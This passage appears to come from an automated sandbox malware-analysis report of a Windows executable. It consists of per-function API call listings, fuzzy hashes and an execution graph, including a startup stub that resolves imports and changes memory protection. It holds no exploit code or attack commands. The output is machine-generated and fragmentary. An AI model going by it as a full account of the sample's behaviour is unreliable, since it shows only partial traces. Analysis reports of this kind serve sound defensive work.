                                                                                      • GetWindowPlacement.USER32(?,?,?,?,?,00411B7F,?,General,?,00000000,00000001), ref: 00401904
                                                                                      • memset.MSVCRT ref: 00401917
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: PlacementWindowmemset
                                                                                      • String ID: WinPos
                                                                                      • API String ID: 4036792311-2823255486
                                                                                      • Opcode ID: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                                                                      • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                      • Opcode Fuzzy Hash: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                                                                      • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                      APIs
                                                                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                      • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                      • wcscat.MSVCRT ref: 0040DCFF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileModuleNamewcscatwcsrchr
                                                                                      • String ID: _lng.ini
                                                                                      • API String ID: 383090722-1948609170
                                                                                      • Opcode ID: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                                                                      • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                                      • Opcode Fuzzy Hash: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                                                                      • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                                      APIs
                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                      • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                      • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                      • API String ID: 2773794195-880857682
                                                                                      • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                                      • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                                      • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                                      • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                                      APIs
                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 0040A159
                                                                                      • SetWindowLongW.USER32(000000EC,000000EC,00000000), ref: 0040A16B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: LongWindow
                                                                                      • String ID: MZ@
                                                                                      • API String ID: 1378638983-2978689999
                                                                                      • Opcode ID: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                                                                      • Instruction ID: 658df1d6f65a5f4ca5cf2dc917bfbc57e2b12ac14a328fb0c2cac09aa770bd9f
                                                                                      • Opcode Fuzzy Hash: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                                                                      • Instruction Fuzzy Hash: 3FC0027415D116AFDF112B35EC0AE2A7EA9BB86362F208BB4B076E01F1CB7184109A09
                                                                                      APIs
                                                                                      • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                                      • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                                      • memset.MSVCRT ref: 0042BAAE
                                                                                      • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpy$memset
                                                                                      • String ID:
                                                                                      • API String ID: 438689982-0
                                                                                      • Opcode ID: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                                                                      • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                      • Opcode Fuzzy Hash: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                                                                      • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                      APIs
                                                                                        • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: ??2@$memset
                                                                                      • String ID:
                                                                                      • API String ID: 1860491036-0
                                                                                      • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                      • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                      • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                      • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                      APIs
                                                                                      • wcslen.MSVCRT ref: 0040A8E2
                                                                                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                        • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                        • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                      • free.MSVCRT ref: 0040A908
                                                                                      • free.MSVCRT ref: 0040A92B
                                                                                      • memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: free$memcpy$mallocwcslen
                                                                                      • String ID:
                                                                                      • API String ID: 726966127-0
                                                                                      • Opcode ID: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                                                                                      • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                      • Opcode Fuzzy Hash: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                                                                                      • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                      APIs
                                                                                      • wcslen.MSVCRT ref: 0040B1DE
                                                                                      • free.MSVCRT ref: 0040B201
                                                                                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                        • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                        • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                      • free.MSVCRT ref: 0040B224
                                                                                      • memcpy.MSVCRT(00000000,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: free$memcpy$mallocwcslen
                                                                                      • String ID:
                                                                                      • API String ID: 726966127-0
                                                                                      • Opcode ID: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                                                                                      • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                      • Opcode Fuzzy Hash: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                                                                                      • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                      APIs
                                                                                      • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                                                                                        • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                                                                        • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                                        • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                                                      • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                                                                      • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                                                                      • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcmp$memcpy
                                                                                      • String ID:
                                                                                      • API String ID: 231171946-0
                                                                                      • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                      • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                                      • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                      • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                                      APIs
                                                                                      • strlen.MSVCRT ref: 0040B0D8
                                                                                      • free.MSVCRT ref: 0040B0FB
                                                                                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                        • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                        • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                      • free.MSVCRT ref: 0040B12C
                                                                                      • memcpy.MSVCRT(00000000,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: free$memcpy$mallocstrlen
                                                                                      • String ID:
                                                                                      • API String ID: 3669619086-0
                                                                                      • Opcode ID: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                                                                      • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                      • Opcode Fuzzy Hash: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                                                                      • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                      APIs
                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                      • malloc.MSVCRT ref: 00417407
                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                      • free.MSVCRT ref: 00417425
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWide$freemalloc
                                                                                      • String ID:
                                                                                      • API String ID: 2605342592-0
                                                                                      • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                      • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                      • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                      • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: wcslen$wcscat$wcscpy
                                                                                      • String ID:
                                                                                      • API String ID: 1961120804-0
                                                                                      • Opcode ID: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                                                                      • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                      • Opcode Fuzzy Hash: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                                                                      • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                                                                      Execution Graph

                                                                                      Execution Coverage:2.4%
                                                                                      Dynamic/Decrypted Code Coverage:19.9%
                                                                                      Signature Coverage:0.5%
                                                                                      Total number of Nodes:870
                                                                                      Total number of Limit Nodes:22
                                                                                      execution_graph 34103 40fc40 70 API calls 34276 403640 21 API calls 34104 427fa4 42 API calls 34277 412e43 _endthreadex 34278 425115 76 API calls __fprintf_l 34279 43fe40 133 API calls 34107 425115 83 API calls __fprintf_l 34108 401445 memcpy memcpy DialogBoxParamA 34109 440c40 34 API calls 34111 411853 RtlInitializeCriticalSection memset 34112 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34285 40a256 13 API calls 34287 432e5b 17 API calls 34289 43fa5a 20 API calls 34114 401060 41 API calls 34292 427260 CloseHandle memset memset 33168 410c68 FindResourceA 33169 410c81 SizeofResource 33168->33169 33172 410cae 33168->33172 33170 410c92 LoadResource 33169->33170 33169->33172 33171 410ca0 LockResource 33170->33171 33170->33172 33171->33172 34294 405e69 14 API calls 34119 433068 15 API calls __fprintf_l 34296 414a6d 18 API calls 34297 43fe6f 134 API calls 34121 424c6d 15 API calls __fprintf_l 34298 426741 19 API calls 34123 440c70 17 API calls 34124 443c71 44 API calls 34127 427c79 24 API calls 34301 416e7e memset __fprintf_l 34131 42800b 47 API calls 34132 425115 85 API calls __fprintf_l 34304 41960c 61 API calls 34133 43f40c 122 API calls __fprintf_l 34136 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34137 43f81a 20 API calls 34139 414c20 memset memset 34140 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34308 414625 18 API calls 34309 404225 modf 34310 403a26 strlen WriteFile 34312 40422a 12 API calls 34316 427632 memset memset memcpy 34317 40ca30 59 API calls 34318 404235 26 API calls 34141 42ec34 61 API calls __fprintf_l 34142 425115 76 API calls __fprintf_l 34319 425115 77 API calls __fprintf_l 34321 44223a 38 API calls 34148 43183c 112 API calls 34322 44b2c5 _onexit __dllonexit 34327 42a6d2 memcpy __allrem 34150 405cda 65 API calls 34335 43fedc 138 API calls 34336 4116e1 16 API calls __fprintf_l 34153 4244e6 19 API calls 34155 42e8e8 127 API calls __fprintf_l 34156 4118ee RtlLeaveCriticalSection 34341 43f6ec 22 API calls 34158 425115 119 API calls __fprintf_l 33158 410cf3 EnumResourceNamesA 34344 4492f0 memcpy memcpy 34346 43fafa 18 API calls 34348 4342f9 15 API calls __fprintf_l 34159 4144fd 19 API calls 34350 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34351 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34354 443a84 _mbscpy 34356 43f681 17 API calls 34162 404487 22 API calls 34358 415e8c 16 API calls __fprintf_l 34166 411893 RtlDeleteCriticalSection __fprintf_l 34167 41a492 42 API calls 34362 403e96 34 API calls 34363 410e98 memset SHGetPathFromIDList SendMessageA 34169 426741 109 API calls __fprintf_l 34170 4344a2 18 API calls 34171 4094a2 10 API calls 34366 4116a6 15 API calls __fprintf_l 34367 43f6a4 17 API calls 34368 440aa3 20 API calls 34370 427430 45 API calls 34174 4090b0 7 API calls 34175 4148b0 15 API calls 34177 4118b4 RtlEnterCriticalSection 34178 4014b7 CreateWindowExA 34179 40c8b8 19 API calls 34181 4118bf RtlTryEnterCriticalSection 34375 42434a 18 API calls __fprintf_l 34377 405f53 12 API calls 34189 43f956 59 API calls 34191 40955a 17 API calls 34192 428561 36 API calls 34193 409164 7 API calls 34381 404366 19 API calls 34385 40176c ExitProcess 34388 410777 42 API calls 34198 40dd7b 51 API calls 34199 425d7c 16 API calls __fprintf_l 34390 43f6f0 25 API calls 34391 42db01 22 API calls 34200 412905 15 API calls __fprintf_l 34392 403b04 54 API calls 34393 405f04 SetDlgItemTextA GetDlgItemTextA 34394 44b301 ??3@YAXPAX 34397 4120ea 14 API calls 3 library calls 34398 40bb0a 8 API calls 34400 413f11 strcmp 34204 434110 17 API calls __fprintf_l 34207 425115 108 API calls __fprintf_l 34401 444b11 _onexit 34209 425115 76 API calls __fprintf_l 34212 429d19 10 API calls 34404 444b1f __dllonexit 34405 409f20 _strcmpi 34214 42b927 31 API calls 34408 433f26 19 API calls __fprintf_l 34409 44b323 FreeLibrary 34410 427f25 46 API calls 34411 43ff2b 17 API calls 34412 43fb30 19 API calls 34221 414d36 16 API calls 34223 40ad38 7 API calls 34414 433b38 16 API calls __fprintf_l 34094 44b33b 34095 44b344 ??3@YAXPAX 34094->34095 34096 44b34b 34094->34096 34095->34096 34097 44b354 ??3@YAXPAX 34096->34097 34098 44b35b 34096->34098 34097->34098 34099 44b364 ??3@YAXPAX 34098->34099 34100 44b36b 34098->34100 34099->34100 34101 44b374 ??3@YAXPAX 34100->34101 34102 44b37b 34100->34102 34101->34102 34227 426741 21 API calls 34228 40c5c3 125 API calls 34230 43fdc5 17 API calls 34415 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34233 4161cb memcpy memcpy memcpy memcpy 33173 44b3cf 33174 44b3e6 33173->33174 33179 44b454 33173->33179 33174->33179 33186 44b40e GetModuleHandleA 33174->33186 33176 44b45d GetModuleHandleA 33180 44b467 33176->33180 33177 44b49a 33199 44b49f 33177->33199 33179->33176 33179->33177 33179->33180 33180->33179 33181 44b487 GetProcAddress 33180->33181 33181->33179 33182 44b405 33182->33179 33182->33180 33183 44b428 GetProcAddress 33182->33183 33183->33179 33184 44b435 VirtualProtect 33183->33184 33184->33179 33185 44b444 VirtualProtect 33184->33185 33185->33179 33187 44b417 33186->33187 33189 44b454 33186->33189 33218 44b42b GetProcAddress 33187->33218 33191 44b45d GetModuleHandleA 33189->33191 33192 44b49a 33189->33192 33198 44b467 33189->33198 33190 44b41c 33190->33189 33194 44b428 GetProcAddress 33190->33194 33191->33198 33193 44b49f 776 API calls 33192->33193 33193->33192 33194->33189 33195 44b435 VirtualProtect 33194->33195 33195->33189 33196 44b444 VirtualProtect 33195->33196 33196->33189 33197 44b487 GetProcAddress 33197->33189 33198->33189 33198->33197 33200 444c4a 33199->33200 33201 444c56 GetModuleHandleA 33200->33201 33202 444c68 __set_app_type __p__fmode __p__commode 33201->33202 33204 444cfa 33202->33204 33205 444d02 __setusermatherr 33204->33205 33206 444d0e 33204->33206 33205->33206 33227 444e22 _controlfp 33206->33227 33208 444d13 _initterm __getmainargs _initterm 33209 444d6a GetStartupInfoA 33208->33209 33211 444d9e GetModuleHandleA 33209->33211 33228 40cf44 33211->33228 33215 444dcf _cexit 33217 444e04 33215->33217 33216 444dc8 exit 33216->33215 33217->33177 33219 44b454 33218->33219 33220 44b435 VirtualProtect 33218->33220 33222 44b45d GetModuleHandleA 33219->33222 33223 44b49a 33219->33223 33220->33219 33221 44b444 VirtualProtect 33220->33221 33221->33219 33226 44b467 33222->33226 33224 44b49f 776 API calls 33223->33224 33224->33223 33225 44b487 GetProcAddress 33225->33226 33226->33219 33226->33225 33227->33208 33279 404a99 LoadLibraryA 33228->33279 33230 40cf60 33267 40cf64 33230->33267 33287 410d0e 33230->33287 33232 40cf6f 33291 40ccd7 ??2@YAPAXI 33232->33291 33234 40cf9b 33305 407cbc 33234->33305 33239 40cfc4 33323 409825 memset 33239->33323 33240 40cfd8 33328 4096f4 memset 33240->33328 33245 40d181 ??3@YAXPAX 33247 40d1b3 33245->33247 33248 40d19f DeleteObject 33245->33248 33246 407e30 _strcmpi 33249 40cfee 33246->33249 33352 407948 free free 33247->33352 33248->33247 33251 40cff2 RegDeleteKeyA 33249->33251 33252 40d007 EnumResourceTypesA 33249->33252 33251->33245 33254 40d047 33252->33254 33255 40d02f MessageBoxA 33252->33255 33253 40d1c4 33353 4080d4 free 33253->33353 33256 40d0a0 CoInitialize 33254->33256 33333 40ce70 33254->33333 33255->33245 33350 40cc26 strncat memset RegisterClassA CreateWindowExA 33256->33350 33260 40d1cd 33354 407948 free free 33260->33354 33262 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33351 40c256 PostMessageA 33262->33351 33264 40d061 ??3@YAXPAX 33264->33247 33268 40d084 DeleteObject 33264->33268 33265 40d09e 33265->33256 33267->33215 33267->33216 33268->33247 33271 40d0f9 GetMessageA 33272 40d17b CoUninitialize 33271->33272 33273 40d10d 33271->33273 33272->33245 33274 40d113 TranslateAccelerator 33273->33274 33276 40d145 IsDialogMessage 33273->33276 33277 40d139 IsDialogMessage 33273->33277 33274->33273 33275 40d16d GetMessageA 33274->33275 33275->33272 33275->33274 33276->33275 33278 40d157 TranslateMessage DispatchMessageA 33276->33278 33277->33275 33277->33276 33278->33275 33280 404ac4 GetProcAddress 33279->33280 33281 404aec 33279->33281 33282 404ad4 33280->33282 33283 404add FreeLibrary 33280->33283 33285 404b13 33281->33285 33286 404afc MessageBoxA 33281->33286 33282->33283 33283->33281 33284 404ae8 33283->33284 33284->33281 33285->33230 33286->33230 33288 410d17 LoadLibraryA 33287->33288 33289 410d3c 33287->33289 33288->33289 33290 410d2b GetProcAddress 33288->33290 33289->33232 